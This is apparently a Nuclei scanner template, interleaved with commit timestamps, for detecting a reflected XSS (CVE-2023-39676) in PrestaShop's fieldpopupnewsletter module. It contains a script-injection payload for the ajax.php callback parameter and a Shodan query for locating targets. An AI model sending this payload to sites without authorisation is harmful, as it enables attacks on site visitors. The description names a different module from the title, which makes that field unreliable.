2023-09-07 09:43:17 +00:00
id : CVE-2023-39676
2023-09-11 06:44:30 +00:00
2023-09-07 09:43:17 +00:00
info :
2023-09-11 06:44:30 +00:00
name : PrestaShop XSS in fieldpopupnewsletter Module
2023-09-07 09:43:17 +00:00
author : meme-lord
severity : medium
2023-09-11 06:44:30 +00:00
description : |
SimpleImportProduct Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php.
2023-09-07 09:43:17 +00:00
reference :
- https://blog.sorcery.ie/posts/fieldpopupnewsletter_xss/
2023-09-11 06:44:30 +00:00
metadata :
max-request : 1
shodan-query : html:"fieldpopupnewsletter"
verified : "true"
2023-09-07 09:43:17 +00:00
tags : cve,cve2023,prestashop,xss
http :
- method : GET
path :
2023-09-11 06:44:30 +00:00
- "{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E"
2023-09-07 09:43:17 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2023-09-11 06:44:30 +00:00
- "<script>alert(document.domain)</script>"
2023-09-07 09:43:17 +00:00
- "Invalid email"
condition : and
2023-09-11 06:44:30 +00:00
- type : status
status :
- 200